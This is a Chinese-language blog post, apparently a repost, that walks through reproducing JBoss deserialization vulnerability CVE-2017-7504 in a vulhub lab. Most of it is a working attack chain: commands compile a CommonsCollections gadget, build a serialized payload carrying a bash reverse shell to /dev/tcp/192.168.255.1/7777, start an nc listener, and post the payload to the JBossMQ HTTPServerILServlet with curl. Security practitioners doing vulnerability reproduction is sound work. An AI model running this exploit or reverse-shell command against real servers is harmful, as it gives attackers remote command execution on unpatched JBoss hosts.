码迷,mamicode.com
首页 > 其他好文 > 详细

jboss反序列化漏洞复现(CVE-2017-7504)

时间:2020-07-25 23:56:07      阅读:134      评论:0      收藏:0      [点我收藏+]

标签:注意   png   loading   ons   bash   hub   curl   tcp   搭建   

0x01 环境

使用vulhub搭建:/vulhub-master/jboss/CVE-2017-7504

漏洞点:http://192.168.255.130:8080/jbossmq-httpil/HTTPServerILServlet

技术图片

0x02 复现

工具:https://github.com/joaomatosf/JavaDeserH2HC

进入目录,选择一个Gadget:ExampleCommonsCollections1WithHashMap,编译并生成序列化数据::

javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java

注意,windows下会报错,需要在linux下执行,接着执行

java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "bash -i >& /dev/tcp/192.168.255.1/7777 0>&1"

双引号内是我们要执行的命令,我用bash反弹一个shell到物理机win10,这条命令会在当前目录下生成一个ExampleCommonsCollections1WithHashMap.ser文件

技术图片

 win10要接收shell,先要关闭防火墙,然后用nc监听7777端口:

nc.exe-master>nc64.exe -lvvp 7777

linux执行:

sudo curl http://127.0.0.1:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ExampleCommonsCollections1WithHashMap.ser

技术图片

 成功反弹shell

参考文章:https://www.cnblogs.com/yuzly/p/11240101.html

jboss反序列化漏洞复现(CVE-2017-7504)

标签:注意   png   loading   ons   bash   hub   curl   tcp   搭建   

原文地址:https://www.cnblogs.com/rnss/p/13376149.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!